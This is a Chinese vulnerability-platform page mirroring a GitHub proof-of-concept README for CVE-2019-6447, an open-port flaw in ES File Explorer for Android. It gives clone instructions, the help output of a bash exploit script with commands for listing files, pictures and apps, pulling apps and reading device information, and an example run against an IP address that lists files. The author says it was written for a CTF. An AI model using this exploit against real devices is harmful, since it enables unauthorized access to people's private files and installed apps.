漏洞平台

POC详情： 42b431abd393a7a5da5bfc3e791bf68c79f5934e

来源

https://github.com/julio-cfa/POC-ES-File-Explorer-CVE-2019-6447

关联漏洞

标题： ES File Explorer File Manager application for Android 访问控制错误漏洞 (CVE-2019-6447)
描述：ES File Explorer File Manager application for Android（ES文件浏览器或文件管理器）是一款基于Android系统的多功能手机文件、程序和进程管理器，它支持在手机、电脑、远程和蓝牙间浏览管理文件。基于Android平台的ES File Explorer File Manager application 4.1.9.7.4及之前版本中存在安全漏洞，该漏洞源于ES应用程序在运行一次之后，TCP 59777端口并未关闭依旧可以通过HTTP协议接收JSON数据。

描述

Very basic bash script to exploit the CVE-2019-6447.

介绍

# PoC ES File Explorer 4.1.9.7.4 (CVE-2019-6447)

<div align="center"><img height="150px" width="150px" src="https://img.icons8.com/ios/500/es-file-explorer.png"></img></div>

##

<p align="justify">This is a very simple implementation in bash of the <a href="https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-6447">CVE-2019-6447</a> PoC. It basically uses curl to send the requests with the right parameters. I've built it as I was looking for a similar script during a CTF and couldn't find any. You can play around with the original script and customize it the way you like it better.</p>


### Installation:

Simply clone the repository and use the .sh file.

```git
git clone git@github.com:julio-cfa/POC-ES-File-Explorer-CVE-2019-6447.git
```

Or copy and paste the raw content to a file.

### Usage:

```git
kyoto :: ~ % ./ESExplorerExploit.sh -h                            

--- This is a very simple PoC of the ES File Explorer CVE-2019-6447 ---

You can try the following commands: 

listFiles	List all files
listPics	List all pictures
listVideos	List all videos
listAudios	List all audios
listApps	List all applications installed
listAppsSystem	List system apps
listAppsPhone	List communication related applications
listAppsSdcard	List the apps installed on the sd card
listAppsAll	List all applications
getAppThumbnail	List icons for the specified application
appLaunch	Start the developed application
appPull         Download an application from your device
getDeviceInfo	Get system information

Usage example: ./ESExplorerExploit.sh 10.10.10.247 sdcard listFiles

```

### Example:

```git
kyoto :: ~ % ./ESExplorerExploit.sh 10.10.10.247 sdcard/DCIM listFiles                                                                               
[
{"name":"example1.jpg", "time":"4/21/21 02:38:08 AM", "type":"file", "size":"135.33 KB (138,573 Bytes)", }, 
{"name":"example2.png", "time":"4/21/21 02:37:50 AM", "type":"file", "size":"6.24 KB (6,392 Bytes)", }, 
{"name":"example3.jpg", "time":"4/21/21 02:38:18 AM", "type":"file", "size":"1.14 MB (1,200,401 Bytes)", }, 
{"name":"example4.png", "time":"4/21/21 02:37:21 AM", "type":"file", "size":"124.88 KB (127,876 Bytes)", }
]
```

### References:

In case you're curious about how this exploit works behind the scenes OR in case it fails and you have to build your own script, you can give a read to the following links:

https://packetstormsecurity.com/files/163303/ES-File-Explorer-4.1.9.7.4-Arbitrary-File-Read.html \
https://github.com/fs0c131y/ESFileExplorerOpenPortVuln \
https://www.safe.security/assets/img/research-paper/pdf/es-file-explorer-vulnerability.pdf \
https://medium.com/@knownsec404team/analysis-of-es-file-explorer-security-vulnerability-cve-2019-6447-7f34407ed566

文件快照


 [4.0K]  /data/pocs/42b431abd393a7a5da5bfc3e791bf68c79f5934e
├── [1.3K]  ESExplorerExploit.sh
└── [2.7K]  README.md

0 directories, 2 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。